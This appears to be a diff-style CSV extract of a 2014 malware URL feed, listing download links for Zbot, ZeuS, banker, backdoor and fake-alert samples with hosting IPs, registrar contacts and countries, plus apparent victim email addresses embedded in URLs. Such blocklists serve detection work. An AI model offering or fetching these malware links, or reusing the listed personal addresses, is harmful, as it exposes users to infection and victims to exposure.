+"2014/05/27_04:02","mahindrainsurance.com/Download_Doc/Risposta_Info_1103.zip?dbspa3@actaliscertymail.it_I8d","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Doc/Risposta_Info_1103.zip?cinziofarinelli@libero.it_7pzc6tde","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta_info_1103.zip?cinziofarinelli@libero.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip?fernando.zellettaatalice.it_ftowwc","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", 
+"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip?fernando.zelletta@alice.it_ftowwc","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip?fernando.zelletta@alice.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","innatek.com/ListinoPrezzi.zip","63.111.67.9","ns3.actwd.net.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse@web.com","11486","0","US", +"2014/05/27_04:02","innatek.com/ListinoPrezzi.zip?SEmfjmWrPDXEz","63.111.67.9","ns3.actwd.net.","Trojan.Zbot","Registrar Abuse Contact abuse@web.com","11486","0","US", +"2014/05/27_04:02","hobbat.fvds.ru/DHL%20Document.zip","82.146.42.130","hobbat.fvds.ru.","Trojan.Zbot","-","29182","0","RU", +"2014/05/27_04:02","hobbat.fvds.ru/DHL","82.146.42.130","hobbat.fvds.ru.","Document.zip Trojan.Email.Gen","-","29182","0","RU", +"2014/05/27_04:02","hnskorea.co.kr/alberta/dingo.exe","203.242.210.105","exp1.ecplaza.net.","Trojan.Agent.ED","-","7557","0","KR", +"2014/05/27_04:02","grendizer.biz/statistiche/fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","gulf-industrial.com/images/2103USa.qta","91.103.216.110","secure.dfsv66.com.","Trojan.Downloader","Registrar Abuse Contact abuse@enom.com","29550","0","GB", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", 
+"2014/05/27_04:02","grendizer.biz/Informazioni/statistiche.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/ordine4582923332.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Info.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/statistiche.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/ordine4582923332.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/statistiche/fattura05032014.zip?qgbaprb3jqghxxof","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejrea3r_emanuele.monfriniatfastwebnet.it","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejrea3r_emanuele.monfrini+at+fastwebnet.it","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", 
+"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejrea3r_emanuele.monfrini%20at%20fastwebnet.it","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/info.zip?phmtllqsewlgejre=","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/fattura05032014.zip?xx0frhnydqgzvzfzugbs5xm","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/ordine/fattura05032014.zip?uiukcav35d","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/informazioni/statistiche.zip?vfw=","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/informazioni/statistiche.zip?vfww8lyfaiccpr_elke.staiger+at+fdp.landtag-bw.de","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/informazioni/ordine4582923332.zip?boweipzoa374cr_info@bikesplaza.nl","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Info.zip?17kDYCBNi6t","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/Informazioni/Fattura05032014.zip?zav6BNgeGvW89WPVOQlRX","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", 
+"2014/05/27_04:02","grendizer.biz/fattura/statistiche.zip?l7ucqay9bgq6i6sk","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/ordine4582923332.zip?vybhzpsoxzapz0xdt","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip?jwui91zljfn","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip?dzmooxysgf3yt6ju2ehhm","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","grendizer.biz/fattura/fattura05032014.zip?9hq3vacty6ggvex","85.235.154.18","mwin05.masterweb.it.","Trojan.Zbot","Christian Scalas / christian.scalas@gmail.com","31034","0","IT", +"2014/05/27_04:02","go-quicky.com/admin_old_dev/css/1504USd.exe","162.210.70.39","162.210.70-39.confluence-networks.com.","Spyware.Zbot","Registrar Abuse Contact abuse@domrobot.com","40034","0","VG", +"2014/05/27_04:02","dougmlee.com/DHL","50.21.187.135","s15569399.onlinehome-server.com.","Document.zip Trojan.Email.Gen","Registrar Abuse Contact abuse@1and1.com","8560","0","US", +"2014/05/27_04:02","directxex.com/uploads/919691940.p-update.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","dougmlee.com/DHL%20Document.zip","50.21.187.135","s15569399.onlinehome-server.com.","Trojan.Zbot","Registrar Abuse Contact abuse@1and1.com","8560","0","US", +"2014/05/27_04:02","directxex.com/uploads/610411940.save.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/535825339.androm.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact 
abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/2139980916.S4_Crack.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/42238721.Amazon","5.135.127.68","-","Rechnungs Tool.exe Backdoor.Bot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/2050276296.scan0001.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/1627320498.runerr.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/164923136.cpu.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/1257844607.encrcyper.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","directxex.com/uploads/1149332910.Host2_crypter_05.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","destre45.com/p/svhost.exe","193.203.50.51","-","Trojan.Agent.ED","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", +"2014/05/27_04:02","directxex.com/uploads/100312839.CryptocurrencyTradingBotV1.4.exe","5.135.127.68","-","Spyware.Zbot","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/05/27_04:02","destre45.com/p/f.exe","193.203.50.51","-","Trojan.Agent.ED","Registrar Abuse Contact abuse@bizcn.com","48031","0","UA", +"2014/05/27_04:02","demo.vertexinfo.in/conclusione/dettagli.zip","109.203.112.170","-","Trojan.Extension.Exploit","Shrikant Swami / srikantsr@gmail.com","29550","0","GB", +"2014/05/27_04:02","demo.vertexinfo.in/conclusione/dettagli.zip?formazione@feldenkrais.it","109.203.112.170","-","Trojan.Zbot","Shrikant Swami / srikantsr@gmail.com","29550","0","GB", 
+"2014/05/27_04:02","demo.vertexinfo.in/conclusione/dettagli.zip?formazione%20at%20feldenkrais.it","109.203.112.170","-","Trojan.Zbot","Shrikant Swami / srikantsr@gmail.com","29550","0","GB", +"2014/05/27_04:02","decrolyschool.be/backup/1_1_777.exe","217.21.184.230","linweb003.webhosting.be.","Trojan.Agent.ED","Not shown, please visit www.dns.be for webbased whois. / info@my-websitebuilder.com","34762","0","BE", +"2014/05/27_04:02","decografix.com/wp-content/uploads/2014/03/b41.exe","184.172.57.26","184.172.57.26-static.reverse.softlayer.com.","Trojan.Inject","Registrar Abuse Contact domainabuse@tucows.com","36351","0","US", +"2014/05/27_04:02","csmail.iggcn.com/temp/service_mail/attachments/2014/03/11/2014031105343091111.zip","66.171.200.210","-","Trojan.Downloader.RRE","-","55034","0","US", +"2014/05/27_04:02","cope.it/templates/webstat/finanzgruppe_volksbanken_ne/index","65.98.23.91","-","at cope.it-templates-webstat-finanzgruppe_volksbanken_ne.htm Trojan.Email.FakeDoc","-","25653","0","US", +"2014/05/27_04:02","csmail.iggcn.com/temp/service_mail/attachments/2014/03/11/2014031105343091111.zip","66.171.200.210","-","Trojan.Zbot","-","55034","0","US", +"2014/05/27_04:02","classicspeedway.com/ff.exe","116.0.23.229","hiruko.instanthosting.com.au.","Trojan.Zbot","Registrar Abuse Contact domains@crazydomains.com","9280","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Estratto/Dati.zip","103.4.16.91","whs.clientdns.com.","Trojan.Extension.Exploit","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Dettagli_Fatture.zip","103.4.16.91","whs.clientdns.com.","Trojan.Extension.Exploit","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Conto.zip","103.4.16.91","whs.clientdns.com.","Trojan.Extension.Exploit","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", 
+"2014/05/27_04:02","centralwestwater.com.au/Estratto/Dati.zip","103.4.16.91","whs.clientdns.com.","Trojan.Zbot","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Dettagli_Fatture.zip?aladinodepaulis@uniadriatica.it","103.4.16.91","whs.clientdns.com.","Trojan.Zbot","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","centralwestwater.com.au/Conto.zip?gZ5lXOdeRY7y","103.4.16.91","whs.clientdns.com.","Trojan.Zbot","Marg Redfern / Visit whois.ausregistry.com.au for Web based WhoIs","58940","0","AU", +"2014/05/27_04:02","americancareconcept.com/modules/webstat/rechnungonline_telekom_rt/2014_05_rechnungonline_8290155236sign.zip","198.98.102.215","215.0-24.102.98.198.in-addr.arpa.","Trojan.Email.FakeDoc","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18978","0","US", +"2014/05/27_04:02","americancareconcept.com/modules/webstat/rechnungonline_telekom_rt/2014_05_rechnungonline_8290155236sign.zip","198.98.102.215","215.0-24.102.98.198.in-addr.arpa.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18978","0","US", +"2014/05/27_04:02","amazingvacationhotels.com/wp-content/themes/HotelWeb2/connect/mac.exe","192.186.200.130","ip-192-186-200-130.ip.secureserver.net.","Trojan.Ransom.ED","-","26496","0","US", +"2014/05/27_04:02","-","209.35.37.129/schuld/schuld.zip","dhwhiterealestate.com.","Trojan.Extension.Exploit","-","11305","0","US", +"2014/05/27_04:02","-","209.35.37.129/schuld/schuld.zip?schuld-pdf=96498320212=areyphv@fag.de","dhwhiterealestate.com.","Trojan.Zbot","-","11305","0","US", +"2014/05/27_04:02","-","209.35.37.129/schuld/schuld.zip?schuld-pdf=96498320212=areyphv+at+fag.de%2F","dhwhiterealestate.com.","Trojan.Zbot","-","11305","0","US", +"2014/05/27_04:02","-","185.38.249.242/b7.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", 
+"2014/05/27_04:02","-","185.38.249.242/b9.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/b2.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/b5.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/a14.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","185.38.249.242/a5.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/27_04:02","-","111.26.23.2/11.exe","-","Trojan.Agent","-","9808","0","CN", +"2014/05/27_04:02","-","115.146.2.58/pqosepgfb","swqxx58.secure.ne.jp.","Spyware.ZeuS.GO","-","9597","0","JP", +"2014/05/27_04:02","-","185.38.249.242/a13.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/12_19:03","-","62.76.43.78/p2p/PP_detalis_726716942049.pdf.exe","62-76-43-78.clodo.ru.","Trojan.Zbot","-","48172","0","RU", +"2014/05/12_00:24","iwgtest.co.uk/homezinctech/wp-admin/main/adobe_flash.exe","69.28.199.10","69.28.199.10.hostpapa.com.","Spyware.Zbot.ED","IWG Ltd / -","13768","0","US", +"2014/05/12_00:24","kadirzerey.com/wp-content/themes/genegri/file.ecr","31.169.73.112","server98.tr73.dhs.com.tr.","Trojan.ZeuS","Registrar Abuse Contact abuse@ihs.com.tr","56582","0","TR", +"2014/05/12_00:24","murbil.hostei.com/wp-content/themes/Mizzo/file.ecr","31.170.160.249","-","Trojan.ZeuS","-","47583","0","US", +"2014/05/12_00:24","rentfromart.com/media/system/images/Java.exe","72.167.149.183","ip-72-167-149-183.ip.secureserver.net.","Trojan.Agent","-","26496","0","US", +"2014/05/12_00:24","tcrwharen.homepage.t-online.de/11","80.150.6.138","b2c.t-online.de.","Spyware.ZeuS","hostmaster@t-online.net","3320","0","DE", +"2014/05/12_00:24","uploads.tmweb.ru/sFAAd3uEW9.exe","92.53.118.140","ultra.timeweb.ru.","Trojan.Zbot","-","9123","0","RU", 
+"2014/05/12_00:24","strangeduckfilms.com/222","72.34.42.5","versace.livingdot.com.","Trojan.Crypt.NKN","Registrar Abuse Contact abuse@enom.com","33494","0","US", +"2014/05/12_00:24","citymediamagazin.hu/spacey/egress","87.229.77.23","webszerver.autofejlesztes.hu.","Spyware.ZeuS","-","61998","0","HU", +"2014/05/12_00:24","www.freemao.com/pics/file.ecr","195.110.150.4","net150-004.mclink.it.","Spyware.ZeuS.GO","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/12_00:24","citymediamagazin.hu/poniards/figurine","87.229.77.23","webszerver.autofejlesztes.hu.","Spyware.ZeuS","-","61998","0","HU", +"2014/05/12_00:24","-","181.50.248.15/webalizer/webstate/files/soft.exe","Static-IP-18150024815.cable.net.co.","Trojan.Zbot","-","10620","0","CO", +"2014/05/12_00:24","-","185.38.249.242/pl.exe","n249h242.rev.sprintdatacenter.pl.","Worm.Autorun","-","197226","0","PL", +"2014/05/12_00:24","allforlove.de/11","217.13.199.48","www28.prosite.de.","Spyware.Zbot.ED","info@speedbone.de","15657","0","DE", +"2014/05/12_00:24","adlock.in/download/371815/file.exe","192.254.137.131","adl.adlock.in.","PUP.Optional.FileServer.A","edik johnson / adminsoft4me@gmail.com","46606","0","US", +"2014/05/12_00:24","akirkpatrick.com/11","81.27.85.16","zeus7.easy-internet.co.uk.","Spyware.Zbot.ED","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","25577","0","GB", +"2014/05/12_00:24","alexanderinteriorsanddesign.com/errant/topics","162.144.87.156","server.alexanderinteriorsanddesign.com.","Spyware.ZeuS","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2014/05/12_00:24","arkinsoftware.in/images/nukotobne.exe","216.151.164.53","shared-hosting.njtech.com.","Trojan.Agent.FSAVXGen","JN Prasad / jnprasad@arkinsoftware.com","7393","0","US", +"2014/05/12_00:24","arkinsoftware.in/images/inexsabit.exe","216.151.164.53","shared-hosting.njtech.com.","Trojan.Inject.ED","JN Prasad / jnprasad@arkinsoftware.com","7393","0","US", 
+"2014/05/12_00:24","arkinsoftware.in/images/aveksynkens.exe","216.151.164.53","shared-hosting.njtech.com.","Trojan.Zbot","JN Prasad / jnprasad@arkinsoftware.com","7393","0","US", +"2014/05/12_00:24","beespace.com.ua/hook/hookkey.exe","91.222.136.251","web123.ukraine.com.ua.","Trojan.Agent","% =========== / -","47781","0","UA", +"2014/05/12_00:24","classicallyabsurdphotography.com/bunked/tinning","184.168.236.1","p3nlhg136c1136.shr.prod.phx3.secureserver.net.","Spyware.ZeuS","-","26496","0","US", +"2014/05/09_15:10","sadiqtv.com/111","162.253.151.131","stats.salmon.arvixe.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact compliance@domain-inc.net","36351","0","US", +"2014/05/09_15:10","rallyeair.com/111","82.102.6.32","ns2.webhs.org.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","25137","0","PT", +"2014/05/09_15:10","nbook.far.ru/111","195.16.42.37","far.ru.freehosting.centre.ru.","Trojan.Zeus.GameOver","-","3216","0","RU", +"2014/05/09_15:10","pgalvaoteles.pt/111","82.102.5.201","hosting27.serverhs.org.","Trojan.Zeus.GameOver","P. 
Galvão Teles - Prestação de Serviços Lda / dominios@webhs.pt","25137","0","PT", +"2014/05/09_15:10","lefos.net/111","46.4.120.118","eu3.1host.gr.","Trojan.Zeus.GameOver","-","24940","0","DE", +"2014/05/09_15:10","gogetgorgeous.com/111","103.19.89.55","cloud1.labelhosting.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse@1and1.com","132717","0","IN", +"2014/05/09_15:10","decota.es/111","134.0.14.18","-","Trojan.Zeus.GameOver","-","197712","0","ES", +"2014/05/09_15:10","beautysafari.com/111","209.159.189.43","virtualmin1.vaxxine.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse@namejuice.com","11181","0","CA", +"2014/05/09_15:10","caclclo.web.fc2.com/111","208.71.106.48","hps14.fc2.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact domainabuse@tucows.com","40263","0","US", +"2014/05/09_15:10","axisbuild.com/111","62.233.121.75","origin.easyspace.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact abuse@easyspace.com","20860","0","GB", +"2014/05/09_15:10","atelierprincesse.web.fc2.com/111","208.71.106.49","hps15.fc2.com.","Trojan.Zeus.GameOver","Registrar Abuse Contact domainabuse@tucows.com","40263","0","US", +"2014/11/25_08:30","-","104.152.215.90/1.html","90-215-152-104-static.reverse.queryfoundry.net.","CVE-2014-6332 exploit","-","62638","0","US", +"2014/11/27_18:24","systemscheckusa.com/","208.94.229.238","-","Browlock.FakeInfection","moniker.com billing department / tech@moniker.com","19710","0","US", +"2014/11/27_18:24","www.email-login-support.com/index-10.html","192.186.249.4","ip-192-186-249-4.ip.secureserver.net.","Browlock.FakeInfection","Registrar Abuse Contact abuse@websitewelcome.com","26496","0","US", +"2014/11/27_18:24","97b1c56132dfcdd90f93-0c5c8388c0a5897e648f883e2c86dc72.r54.cf5.rackcdn.com/","67.135.105.184","-","Browlock.FakeInfection","Registrar Abuse Contact admin@internationaladmin.com","209","0","US", 
+"2014/11/27_18:24","immediateresponseforcomputer.com/index112.htm","23.229.170.164","ip-23-229-170-164.ip.secureserver.net.","Browlock.FakeInfection","-","26496","0","US", +"2014/11/27_18:24","www.consumeralternatives.org/anti-virus-check.html","64.235.60.164","lasvegas-nv-datacenter.com.","Browlock.FakeInfection","Oneandone Private Registration / proxy3263807@1and1-private-registration.com","26277","0","US", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/cra/s.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Agent","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/vvv.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Agent","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","chaveiro.bio.br/tmp/AcbtReader.exe","177.12.163.81","web943.uni5.net.","Trojan.Agent.AI","cert.br, http://www.cert.br/, respectivelly to cert@cert.br","28299","0","BR", +"2014/12/03_08:50","campamento.queenscamp.com/yuppie/staying","74.91.220.2","2.webhosting.ecommerce.com.","Trojan.Agent.CRV","Registrar Abuse Contact domainabuse@tucows.com","32392","0","US", +"2014/12/03_08:50","ftp.flyfishusa.com/lords/vanishings","184.168.240.101","ip-184-168-240-101.ip.secureserver.net.","Trojan.Agent.CRV","Registrar Abuse Contact abuse@web.com","26496","0","US", +"2014/12/03_08:50","optimization-methods.com/Bilder/calc.exe","212.218.192.28","plesk3.nbg1.nethinks.com.","Trojan.Backdoor","Registrar Abuse Contact abuse@vautron.de","8319","0","DE", +"2014/12/03_08:50","paraskov.com/err.exe","66.154.48.2","adulttgpgallery.com.","Trojan.Backdoor","Registrant contact@privacyprotect.org","22653","0","US", +"2014/12/03_08:50","tatschke.net/hbc.exe","190.228.29.82","mx2982.godns.net.","Trojan.Backdoor","-","7303","0","AR", +"2014/12/03_08:50","wt10.haote.com/jywgxrjzd.exe","218.75.155.41","-","Trojan.Backdoor","-","4134","0","CN", 
+"2014/12/03_08:50","www.fiduciariobajio.com.mx/plugins/content/hltv.exe","200.76.36.93","static-200-76-36-93.alestra.net.mx.","Trojan.Backdoor","Banco del Bajio, S.A. / % by email at ayuda@nic.mx .","11172","0","MX", +"2014/12/03_08:50","cmicapui.ce.gov.br/components/com_phocadownload/helpers/modu.exe","54.228.191.94","ec2-54-228-191-94.eu-west-1.compute.amazonaws.com.","Trojan.Banker","Raimundo Osman Lima / netmaster@etice.ce.gov.br","16509","0","US", +"2014/12/03_08:50","harshwhispers.com/img/dunptty.gif","66.240.144.68","noreverse.broadspire.com.","Trojan.Banker","Registrar Abuse Contact domainabuse@tucows.com","23136","0","US", +"2014/12/03_08:50","harshwhispers.com/img/wxynts.gif","66.240.144.68","noreverse.broadspire.com.","Trojan.Banker","Registrar Abuse Contact domainabuse@tucows.com","23136","0","US", +"2014/12/03_08:50","prorodeosportmed.com/templates/atomic/html/mod_custom/default.xx","184.168.16.1","p3nlhg716c1716.shr.prod.phx3.secureserver.net.","Trojan.Banker","-","26496","0","US", +"2014/12/03_08:50","xicaxique.com.br/catalog/view/theme/default/image/image102.jpg","200.219.249.162","static.200.219.249.162.datacenter1.com.br.","Trojan.Banker.DE","Vincent Comercio Eletroeletronico Ltda / registro@br2001.com.br","16397","0","BR", +"2014/12/03_08:50","iybasketball.info/wp-content/themes/twentytwelve/lo.exe","192.186.233.104","ip-192-186-233-104.ip.secureserver.net.","Trojan.Downloader","Kent Culuko / iybball@gmail.com","26496","0","US", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/pnn/1.txt","85.25.176.113","loft2126.serverloft.com.","Trojan.Downloader","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/pnn/12.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Downloader","Registrar Abuse Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","loft2126.dedicatedpanel.com/pnn/20.exe","85.25.176.113","loft2126.serverloft.com.","Trojan.Downloader","Registrar Abuse 
Contact domain-abuse@psi-usa.info","8972","0","DE", +"2014/12/03_08:50","hexadl.line55.net/FLV_Media_Player.exe","104.28.15.104","-","Trojan.Downloader.Agent","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/12/03_08:50","hexadl.line55.net/FLV-HD.exe","104.28.14.104","-","Trojan.Downloader.Agent","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/12/03_08:50","fbku.com/yeni/Porno-HD.exe","94.23.169.208","-","Trojan.Dropper","-","16276","0","FR", +"2014/12/03_08:50","getdatanetukscan.info/sp32_64_10044639319006172375.exe","85.17.73.28","-","Trojan.FakeMS","WhoisProtectService.net PROTECTSERVICE, LTD. / getdatanetukscan.info@whoisprotectservice.net","16265","0","NL", +"2014/12/03_08:50","getdatanetukscan.info/sp32_64_3491943367355003623.exe","85.17.73.28","-","Trojan.FakeMS","WhoisProtectService.net PROTECTSERVICE, LTD. / getdatanetukscan.info@whoisprotectservice.net","16265","0","NL", +"2014/12/03_08:50","d32k27yvyi4kmv.cloudfront.net/installer/Installer.exe","54.239.172.114","server-54-239-172-114.atl50.r.cloudfront.net.","Trojan.Injector","Registrar Abuse Contact abusecomplaints@markmonitor.com","16509","0","US", +"2014/12/03_08:50","extreembilisim.com/themes/blue/Cure.exe","188.132.231.74","cpanel2.webadam.com.","Trojan.MSIL.Injector","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42910","0","TR", +"2014/12/03_08:50","extreembilisim.com/themes/blue/panelServerCrypted.exe","188.132.231.74","cpanel2.webadam.com.","Trojan.MSIL.Injector","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42910","0","TR", +"2014/12/03_08:50","nailbytes1.com/test/86lkL2Xpxa.exe","208.109.216.59","ip-208-109-216-59.ip.secureserver.net.","Trojan.PWS","-","26496","0","US", +"2014/12/03_08:50","hoerbird.net/galerie/w4f3f4.exe","85.13.132.183","dd8432.kasserver.com.","Trojan.Zbot","Registrar Abuse Contact abuse@registrygate.com","34788","0","DE", 
